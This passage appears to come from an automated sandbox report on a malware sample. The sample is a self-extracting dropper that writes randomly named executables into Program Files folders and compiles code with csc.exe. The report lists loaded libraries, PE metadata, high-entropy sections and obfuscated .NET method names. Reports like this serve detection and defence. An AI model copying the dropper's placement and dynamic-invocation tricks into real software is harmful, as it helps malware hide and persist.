                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: mscoree.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: apphelp.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: version.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: wldp.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: profapi.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: sspicli.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ktmw32.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rasapi32.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rasman.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rtutils.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: mswsock.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: winhttp.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: dnsapi.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: winnsi.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: rasadhlp.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: amsi.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: userenv.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: edputil.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: dwrite.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: winmm.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: winmmbase.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: mmdevapi.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: devobj.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: ksuser.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: avrt.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: audioses.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: powrprof.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: umpdc.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: msacm32.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: midimap.dll
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeSection loaded: windowscodecs.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exeJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\039065625c59a1Jump to behavior
                                    Source: 3AAyq819Vy.exeStatic file information: File size 2041114 > 1048576
                                    Source: 3AAyq819Vy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 3AAyq819Vy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 3AAyq819Vy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 3AAyq819Vy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 3AAyq819Vy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 3AAyq819Vy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 3AAyq819Vy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: 3AAyq819Vy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 3AAyq819Vy.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.pdb source: Bridgecommon.exe, 00000005.00000002.1911325001.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp
                                    Source: 3AAyq819Vy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 3AAyq819Vy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 3AAyq819Vy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 3AAyq819Vy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 3AAyq819Vy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.cs.Net Code: Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777245)),Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777259))})
                                    Source: 0.3.3AAyq819Vy.exe.63f9700.0.raw.unpack, hpJE61kMAL8Awig2KFg.cs.Net Code: Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777245)),Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777259))})
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                    Source: C:\hyperContaineragent\Bridgecommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeFile created: C:\hyperContaineragent\__tmp_rar_sfx_access_check_7365984Jump to behavior
                                    Source: 3AAyq819Vy.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBD443 push FFFFFFD0h; retf 0_2_00CBD445
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBF640 push ecx; ret 0_2_00CBF653
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBEB78 push eax; ret 0_2_00CBEB96
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BAD53BF push ebx; ret 5_2_00007FFD9BAD53C2
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BAD36E6 push es; iretd 5_2_00007FFD9BAD36E7
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BAD36DB push es; iretd 5_2_00007FFD9BAD36DF
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BC35223 push edi; ret 5_2_00007FFD9BC35226
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BC327B9 push ecx; ret 5_2_00007FFD9BC327BA
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BC32745 push ecx; ret 5_2_00007FFD9BC32746
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BC34EE5 push esi; ret 5_2_00007FFD9BC34EE7
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE7840F push eax; retf 5_2_00007FFD9BE78410
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE7FBB7 push ebx; retf 5_2_00007FFD9BE7FE6A
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE78357 push eax; retf 5_2_00007FFD9BE78358
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 5_2_00007FFD9BE775D1 push eax; iretd 5_2_00007FFD9BE775D5
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 52_2_00007FFD9BAB53BF push ebx; ret 52_2_00007FFD9BAB53C2
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 52_2_00007FFD9BAB36E6 push es; iretd 52_2_00007FFD9BAB36E7
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 52_2_00007FFD9BAB36DB push es; iretd 52_2_00007FFD9BAB36DF
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 53_2_00007FFD9BAA53BF push ebx; ret 53_2_00007FFD9BAA53C2
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 53_2_00007FFD9BAA36E6 push es; iretd 53_2_00007FFD9BAA36E7
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 53_2_00007FFD9BAA36DB push es; iretd 53_2_00007FFD9BAA36DF
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 54_2_00007FFD9BAC53BF push ebx; ret 54_2_00007FFD9BAC53C2
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 54_2_00007FFD9BAC36E6 push es; iretd 54_2_00007FFD9BAC36E7
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeCode function: 54_2_00007FFD9BAC36DC push es; iretd 54_2_00007FFD9BAC36DF
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAE960A push eax; ret 55_2_00007FFD9BAE960F
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAE964B push cs; ret 55_2_00007FFD9BAE9651
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAE6DC7 push ebp; iretd 55_2_00007FFD9BAE6DC8
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAD53BF push ebx; ret 55_2_00007FFD9BAD53C2
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAD36E6 push es; iretd 55_2_00007FFD9BAD36E7
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BAD36DB push es; iretd 55_2_00007FFD9BAD36DF
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BB0BEB3 push 00000071h; iretd 55_2_00007FFD9BB0BEC0
                                    Source: C:\hyperContaineragent\Bridgecommon.exeCode function: 55_2_00007FFD9BB0792B push ebx; retf 55_2_00007FFD9BB0796A
                                    Source: Bridgecommon.exe.0.drStatic PE information: section name: .text entropy: 7.4610435048156285
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe.5.drStatic PE information: section name: .text entropy: 7.4610435048156285
                                    Source: nFQRHbQjcuhfqIAubZpdQD.exe0.5.drStatic PE information: section name: .text entropy: 7.4610435048156285
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, k504KWGctpYSQhovm00.csHigh entropy of concatenated method names: 'BWkG2nEDmR', 'r6rF3cBjs2FLolh7UEpU', 'sLkBcSBjw9sbEfc8rDbk', 'dcrT2DBjyCslCxWD8NdA', 'ryCsqjBjmT3OfLseeKlo', 'VFnrvKBjagArvs97vMUv', 'E94', 'P9X', 'vmethod_0', 'cpZBbIfoW3k'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, WQwxvDu2qTsVtZSHISD.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, ERocErSBIqy2VSvoxMR.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'WBTBefATJMp', 'jN6BeIH8Oss', 'OQSUrDB5mduvL2b8d6MC', 'vH6Yy2B5aIdLQ839CJAq', 'Y1DfjqB5XkPd2Z9EGJfK', 'Mmy1sYB5PW432XoQoDeI', 'EeCEOHB5xocaQJxBbxxS', 'sWExUXB5ZaHWl6pubqs1'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, ySsgcw84l2KLs7TRiVs.csHigh entropy of concatenated method names: 'Ceq88WTotK', 'KJL8K04SAm', 'AwD8tXMdrI', 'hv48gIJE2h', 'GSC8uPqQFu', 'X8cnNdBsplgUhtc3DfxI', 'Scb8p7BsCgIf2bjqJ6nN', 'bHcw3fBszF3dIGKfyqRS', 'GIMdATBmFDxpCfx3cg5Y', 'zFgWwZBmBXStx0Ij5CRv'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, diy53dBrWcwwZvRb3yK.csHigh entropy of concatenated method names: 'OhfBULg7uq', 'u6yBixKfU2', 'mLuBMo6she', 'oxi03oBtMDYM2dybTceA', 'rpSO7JBtU3XFrZBhaEZh', 'MNTfPVBtiAcRQvbpf423', 'PIHk5ABtl4Zx0IusKxlQ', 'Db1rNqBtfIpxOLvenQXZ', 'bUI57cBtIKms8TW0VaOJ'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, GgtHJaKvFofL2SmLirD.csHigh entropy of concatenated method names: 'RVjKYEoRH6', 'vfGKrf3ItW', 'NNaKLNpUX0', 'UanKUHAlOq', 'VmSKiGQVAo', 'u5GRLqBmlC3wZEZUEe4t', 'NKfcODBmiYAcXeZsPhV3', 'sPJnlSBmM0SVBWr80P2Y', 'W3nA0xBmfy4eXResxkIj', 'emjvCFBmINqgTYpY3Fmb'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, zcXqPh0jDp61ulOAYaE.csHigh entropy of concatenated method names: 'mXV01TRbUb', 'oxD06URjZP', 'PK10RWEOdU', 'YOO09OAhuA', 'Gbc0nxXNOh', 'W3T0dL2eNF', 'jMo0TCMh0J', 'q2X05YUClI', 'njJ0wIFQlI', 'EQY0yEnu1g'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, jgMU8ydkacaPJdVHpux.csHigh entropy of concatenated method names: 'TGddpYKBAr', 'SgNdCpDd2v', 'g5Adz7QSsU', 'WQSTFJNNaF', 'gA8TB1gGwI', 'OJKTW1SVo1', 'B33ToGG0F0', 'kYLTbIqaDu', 'BuYThOekDG', 'tKETG5lnWC'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, GxpkAS2qDCGtoMW2Z45.csHigh entropy of concatenated method names: 'SRa2CVfrL4', 'X922zoOCQN', 'njLjFPJwMy', 'CvfjBWfUrR', 'Qt6jWD5LwG', 'aomjo5x7GF', 'Rpx', 'method_4', 'f6W', 'uL1'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, ExdXquO4u8gJok9RQbU.csHigh entropy of concatenated method names: 'nxMkmqB9deBFIFpagiIp', 'ckkiKFB99f1lfimWZI8A', 'a4G5ksB9ncfKPStaV3aV', 'DxeyosB9TXkwkwDupsBc', 'gDLrClChjX', 't0E4hlB9sUdLw7NaWCI7', 'PJexjdB9wGiVb3ZVoPeT', 'G91kbdB9yNYVcJj8KdUI', 'f1KdDvB9mOF5drflgAro', 'vXbPwdB9aS3pgpsVQNfD'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, pShRhQWIa2drSH7qeXP.csHigh entropy of concatenated method names: 'FyQWDZHSl4', 'KpcW7Jl6jh', 'CUe70bBgtJK8nVIA432n', 'BDLYMnBg8VfvCHWpUJJ0', 'iqDaUqBgKdBiMm3CWRj8', 'gXhOcvBggVtnDRe7ietv', 'EEgi0QBgun7DewaoZXdN', 'SUqnP9BgQLVPi5dBmhjO', 'gjr0q9Bg2b4oEIPD4u38', 'RVEKMyBgjdnjAjbeT30m'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, OocJJipdCwaDqopQ3o2.csHigh entropy of concatenated method names: 'UfBBGjcnu7O', 'kQJBGHhRIFf', 'rJlBG17dUdm', 'QHgBG6HI5f0', 'FRqBGRirJAS', 'HMrBG9J1qgw', 'FABBGnlqYUD', 'WpkChgUIUD', 'KsTBGdokLi8', 'eh1BGTEklBP'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, TaBBsEhU1d1IoHsAgTS.csHigh entropy of concatenated method names: 'LyyhtP8TW5', 'Uwrhgfq68A', 'i9LhusMOPp', 'Eyy02HB2sAmJc9YlGkjA', 'E4u66HB2mVCmyjOJnnud', 'SOdpaoB2wbLcxGxI3P2n', 'mERrqeB2yF0CEbXQniev', 'fnyh46ygPK', 'NINhcNvABq', 'IyC6CtB2TpAQ98whtpN2'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, wUOou9d26E3HSELsovN.csHigh entropy of concatenated method names: 'DcadHHH1F9', 'R5Cd1msyw7', 'Rysd6baRVf', 's5DdRgXULc', 'Kx8d9egB8J', 'pUCdn6T2Wb', 'OR0ddotltX', 'dlXdTgeHWF', 'MA1d515BrE', 'hBLdwFW8yI'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, e1iSR3yfl3b97CK9VW.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'UGBmn2BiO'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, AZnjlsbjRqt16S3abmL.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'JesBeblsQVJ', 'vsbBbBgVvD9', 'M36VkrBQ9nsMrUFRtjCu', 'HM95IlBQn6bLaVDZII3O', 'Y4XAIaBQdyuZBLqIlQ8D', 'gV5OtnBQTiHMykGf5RC3', 'ATVJX1BQ5YhkvFmfjeBA'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, kYFrqeOWJqcqQWiRAIj.csHigh entropy of concatenated method names: 'r2wObXG6Z3', 'LuqOhHpLff', 'oOqOGjy1F0', 'DnZOERsrAh', 'kAXOeZKtFn', 'aGgOO1Q9jv', 'HTgOATGXfm', 'DgjOvLthDj', 'VUcON7H6Ss', 'erFOY1UvIH'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, hpJE61kMAL8Awig2KFg.csHigh entropy of concatenated method names: 'LycqT3BpNnGZgEaKV5Bu', 'FpQsLkBpYoIGyL3HMDuy', 'CJ0qVtdQXE', 'PRcu8UBpiM464k4v7bnA', 'rrNMYTBpMiCpHslKVBYG', 'tDHLkpBplYtUbZDtjHHV', 'Ymdf88BpfFWeaQBRCWNU', 'aVycXkBpIcwjsY6V5JDM', 'Gh7vGBBpSq4wA48u6BHm', 'LApGpLBpDXDrIpx1MXV1'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, srIBSV3T3QDWvbk6hSt.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'JIr3wl9lPu', 'C9O3yYZl9O', 'XLA3seyRFl', 'Dispose', 'sbUwlKBq2ujhsM7c9Q1d', 'yQ65SsBqjqhGWmXnnhlH', 'tv4kw5BqHPWXiHDo3S9b', 'byP3iUBq1gAuHaGB62RW'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, EXweAMWx1ebw7mIO4rs.csHigh entropy of concatenated method names: 'h6SoECMrBW', 'MCaFqXBuWWjG8mU7FcaR', 'srqxk5BuoaYWnPRbYSch', 'UGU8iKBubAgHxc7XBFnB', 'TNC8DABuFI3GOGxvNb8X', 'nLDBmJBuBAHUtpuu8IFT', 'BJVGFQBuhY40AhOnoDPw', 'fxnHe4BuGLD63WMOGOTh', 'QjLoFidnN3', 'cUXoW3yFED'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, mCmEvlG1adNmJgqOK9p.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'L2bBeAyroIF', 'vsbBbBgVvD9', 'aLwC54BjPZBFDbXWGZye', 'pB0lhRBjxKR81MPbjMgy', 'ON2KswBjZf158DGByYTY'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, k5BYRieTsKpNuP1XJtp.csHigh entropy of concatenated method names: 'P9X', 'ncjBeNX9u3d', 'imethod_0', 'PcMewiyhTL', 'MtVRHuB6oIs1hPP8Cpsx', 'sTOgLtB6bF0ncwyrYEGV', 'CpfCeXB6hYnp0l8ymfHY', 'CyaB4eB6GwUjbOIfcAkx', 'gI3WefB6EDPrdcQ32PKT'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, RTTQdtkFvsxQjC3PB01.csHigh entropy of concatenated method names: 'ugrkbhPTf5', 'nTwkhNcVop', 'yqjDCTBqJNw5Y7DXYb03', 'dcu58pBqVxd55PDuZ3K0', 'SlxsI9BqxG0S9SMs7aAm', 'jtgumqBqZWbQW8Qy94hI', 'CmiWRWBq05xOB8ZpooDF', 'cupkZRBq3jATyxvwYVQp', 'r1XkW84KAh', 'OwfgdaBqagOTBRkjeKXZ'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, gTMos9uTKdEioQCYKH7.csHigh entropy of concatenated method names: 'd8duweueI0', 'ljEuyHjt9m', 'XPbusgEcEv', 'JqBumHLOci', 'Ax1uadIEVv', 'TqTuX6B1V3', 'mCruP0cCk3', 'wyhux7D4FD', 'uLNuZthXNw', 'RXAuJ04vs7'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, NSeAsngCUwR5n5mL0aM.csHigh entropy of concatenated method names: 'lO1uFahVr9', 'pN1uBOft7H', 'G35uWuBkjO', 'FmruoymnpH', 'bcIubbKnJr', 'f5UuhLerNa', 'AugJI9BXWTnB78neIdeT', 'fSQGqIBXoxFxSDPsm00k', 'b4yhwnBXb0My6PngQMiU', 'tE9SiWBXh2fkkxf1AE18'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, qCZwyhbdEQh3NNmKEmh.csHigh entropy of concatenated method names: 'hlGbprItCq', 'wkMEukB2ARsV7mtGEEcl', 'Y5t8FpB2vMe0qeroPq7l', 'fgwfH4B2euIxpRfV4Ull', 'W0TPtHB2OQGEyGjvSflJ', 'oTrvkUB2Y2AKr7cbcULh', 'nuKsv6B2rZHh5OCxAXHr', 'tWmKGsB2LMnAR9k7jWCn', 'NgAhGXnGfy', 'yfETxFB2lG46ahLUZh8E'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, h42w0xERl89tHIGnMwC.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'QhcBb4Oae2B', 'PS0BevfForG', 'imethod_0', 'E8EtnoBHz2icAk5il87L', 'V4cHolBHpgjwHyca8rSX', 'xTtdfYBHCS7tScGAKxIM', 'Q6nJ5IB1FHdJOwI2Ww8C', 'JaJggZB1BuhqRFIfr9MH'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, PgSvgRInbf73nn4OdlE.csHigh entropy of concatenated method names: 'N2N', 'B2sBeLxsidM', 'BlxIT7F41a', 'pbIBeUJWUQG', 'tmvItRB5lyuj0RnjnDtt', 'jBCBWNB5fr1tfZk4EujU', 'e67VVoB5itDVXy31NUm0', 'smFTueB5MC1G9JViQLUV', 'aVicPAB5IP5u2NyBmnAj', 'InPwrhB5SSDqfkKrTYD9'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, qyon45WhsxBdXF8B5V5.csHigh entropy of concatenated method names: 'EO5WElGV6K', 'iBSWeRfxyP', 'J18WOWibEe', 'EWEWAXEjPi', 'HaLCquBgrHNpeIqoj38A', 'n2AnORBgNRGRY8UBdwQG', 'OoZFRVBgYbXomHAakwmu', 'S8UkOQBgLQ8I950KQexT', 'DI9S9MBgUm65C5XK79Wt', 'YKWPdCBgim60aEVG8djs'
                                    Source: 0.3.3AAyq819Vy.exe.4d94700.1.raw.unpack, CyOhDqR6HWUDLBBGMQ2.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'FpLiHxBJR5tWIQSCr54f', 'GTT88nBJ9ZMsirB8bR5X', 'i73'
